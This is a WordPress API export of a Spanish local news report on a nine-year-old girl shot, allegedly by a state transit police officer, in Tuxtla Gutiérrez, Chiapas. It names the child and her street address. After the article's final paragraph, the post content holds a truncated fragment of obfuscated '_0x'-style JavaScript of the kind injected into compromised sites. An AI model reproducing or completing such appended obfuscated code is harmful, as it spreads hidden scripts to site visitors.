{"id":10157,"date":"2023-05-23T04:23:16","date_gmt":"2023-05-23T04:23:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10157"},"modified":"2023-05-23T04:23:17","modified_gmt":"2023-05-23T04:23:17","slug":"piden-justicia-por-menor-herida-en-la-colonia-flor-de-mayo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10157","title":{"rendered":"Piden justicia por menor herida en la Colonia Flor de Mayo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1684815750480-1024x768.jpg\" alt=\"\" class=\"wp-image-10158\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1684815750480-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1684815750480-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1684815750480-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1684815750480.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Familiares de la ni\u00f1a Paola Montserrat de nueve a\u00f1os de edad, piden se realicen las investigaciones correspondientes y se castigue a los responsables del ataque a balazos de la que fue v\u00edctima por un elemento polic\u00edaco.<\/p>\n\n\n\n<p>Este lamentable hecho ocurri\u00f3 este domingo por la noche, en calles de la Colonia Flor de Mayo, al extremo Oriente Norte de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los familiares, Paola en compa\u00f1\u00eda de sus madre hab\u00eda salido de su domicilio marcado con el n\u00famero 471 de la calle Los Lirios para asistir a una misa.<\/p>\n\n\n\n<p>Martha Avenda\u00f1o, abuela de la menor relat\u00f3 que, luego de salir de su casa madre e hija caminaron unos metros para esperar un veh\u00edculo.<\/p>\n\n\n\n<p>Al estar junto a un \u00e1rbol la menor recibi\u00f3 un balazo en la espalda por un sujeto que es identificado como elemento de la Polic\u00eda Estatal de Tr\u00e1nsito.<\/p>\n\n\n\n<p>La mujer expone que, el agresor junto con otras personas viven a unos metros de su casa y siempre han tenido una conducta agresiva.<\/p>\n\n\n\n<p>&#8220;Siempre se ponen a tomar, y son agresivos, son polic\u00edas, no sabemos por qu\u00e9 act\u00faan de esa forma&#8221;, indic\u00f3.<\/p>\n\n\n\n<p>Agreg\u00f3 que, no es la primera vez que realizan disparos, que intimidan a la poblaci\u00f3n sin motivo por ello, la poblaci\u00f3n vive atemorizada por estos sujetos.<\/p>\n\n\n\n<p>&#8220;No es justo lo que le hicieron a mi nieta, es una ni\u00f1a, lo \u00fanico que pido es justicia para ella, que estos asesinos sean castigados y que se vayan de este colonia&#8221;, expres\u00f3.<\/p>\n\n\n\n<p>De acuerdo con la abuela la menor permanece internada en el hospital Gilberto G\u00f3mez Maza donde se debate entre la vida y la muerte.<\/p>\n\n\n\n<p>Hasta el cierre en la edici\u00f3n de la informaci\u00f3n, los familiares de la menor informaron que la bala no ha sido extra\u00eddo, y el ataque hacia la menor fue directo.<\/p>\n\n\n\n<p>Sobre el caso la Secretar\u00eda de Seguridad y Protecci\u00f3n Ciudadana inform\u00f3 que uno de ellos ya fue trasladado y puesto a disposici\u00f3n de la autoridad correspondiente para esclarecer los hechos y deslindar responsabilidades, mientras que de la otra persona se contin\u00faa en su b\u00fasqueda para el mismo fin.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Familiares de la ni\u00f1a Paola Montserrat de nueve a\u00f1os de edad, piden se realicen las investigaciones correspondientes y se castigue a los responsables del ataque a balazos de la que fue v\u00edctima por un elemento polic\u00edaco. Este lamentable hecho ocurri\u00f3 este domingo por la noche, en calles de la Colonia Flor de Mayo, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10158,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-10157","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10157","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10157"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10157\/revisions"}],"predecessor-version":[{"id":10159,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10157\/revisions\/10159"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10158"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10157"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10157"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10157"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}